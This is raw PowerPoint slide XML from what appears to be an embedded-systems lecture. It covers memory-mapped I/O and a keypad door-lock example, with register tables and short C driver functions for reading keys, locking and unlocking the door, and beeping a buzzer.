            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Peripheral accesses can be slow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MMIO allows usage of native C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>structs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31853921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Example: security keypad door lock</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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09800"/>
            <a:ext cx="3595688"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0363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3074" name="Object 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685800" y="2286000"/>
          <a:ext cx="7327900" cy="4114800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s11303"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2860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1440427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en-US" smtClean="0"/>
              <a:t>Unique Hardware Environment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44035" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wide range of processors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May be customized or tailored</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Various types of memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ROM, RAM, EEPROM, Flash…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unique peripheral devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Every embedded system is unique!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Almost every rule has an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>exception</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dirty="0" smtClean="0"/>
              <a:t>Keypad interface</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="71724" name="Group 44"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4110027902"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685800" y="2057400"/>
          <a:ext cx="8229600" cy="2304413"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="838200"/>
                <a:gridCol w="1066800"/>
                <a:gridCol w="1600200"/>
                <a:gridCol w="4724400"/>
              </a:tblGrid>
              <a:tr h="6401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288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11:0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RW</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Keypad DATA</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kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>When a key is pressed, the corresponding bit will be set. Cleared by SW.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>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44"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3443990076"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685800" y="4572000"/>
          <a:ext cx="8229600" cy="2128839"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="838200"/>
                <a:gridCol w="1066800"/>
                <a:gridCol w="1600200"/>
                <a:gridCol w="4724400"/>
              </a:tblGrid>
              <a:tr h="6401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28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RO</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Keypad Ready</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Set when a key is pressed and the DATA register is valid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774758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dirty="0" smtClean="0"/>
              <a:t>Aux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>regs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="71724" name="Group 44"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3202559544"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="533400" y="2133600"/>
          <a:ext cx="8229600" cy="1439863"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="838200"/>
                <a:gridCol w="1066800"/>
                <a:gridCol w="1600200"/>
                <a:gridCol w="4724400"/>
              </a:tblGrid>
              <a:tr h="64035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Default Value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Description</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5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WO</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BUZZER – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>will buzz when set</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="1"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44"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1737951831"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="4572000"/>
          <a:ext cx="8229600" cy="1430338"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="838200"/>
                <a:gridCol w="1066800"/>
                <a:gridCol w="1600200"/>
                <a:gridCol w="4724400"/>
              </a:tblGrid>
              <a:tr h="6401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43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WO</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LOCK – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>lock when set, unlock when reset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1791" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="1524000"/>
            <a:ext cx="762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a:t>Buzzer register at 0x200</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31792" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="4038600"/>
            <a:ext cx="762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a:t>Lock register at 0x100</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5500989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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32772" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="609600"/>
            <a:ext cx="7848600" cy="6124754"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>typedef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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unsigned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> data;</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unsigned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ready;</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volatile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> KEYPAD;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>KEYPAD* Keypad = (Keypad*)(0x00100000);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>KeypadGetChar</a:t>
            </a:r>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	while </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(!Keypad-&gt;ready)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>c = Keypad-&gt;data;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	Keypad-&gt;data = 0</a:t>
            </a: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a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	switch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(c) {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRP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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ‘1’;</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‘2’;</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‘3’;</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‘4’;</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‘5’;</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‘6’;</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0x40:</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‘7’;</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‘8’;</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‘9’;</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‘0’;</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0x800:</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	}</a:t>
            </a:r>
          </a:p>
          <a:p>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763215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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="609600"/>
            <a:ext cx="7848600" cy="3140075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#define </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DOOR_AUX_REG 0x100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>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DoorLock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pP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(1, DOOR_AUX_REG);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>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DoorUnlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:defRPr/>
            </a:pP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(0, DOOR_AUX_REG);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pP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6315992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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34820" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="609600"/>
            <a:ext cx="7848600" cy="5908675"/>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#define </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BUZZER_AUX_REG 0x200</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BuzzerShortBeep()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	_sr(1, BUZZER_AUX_REG);</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for</a:t>
            </a:r>
            <a:r>
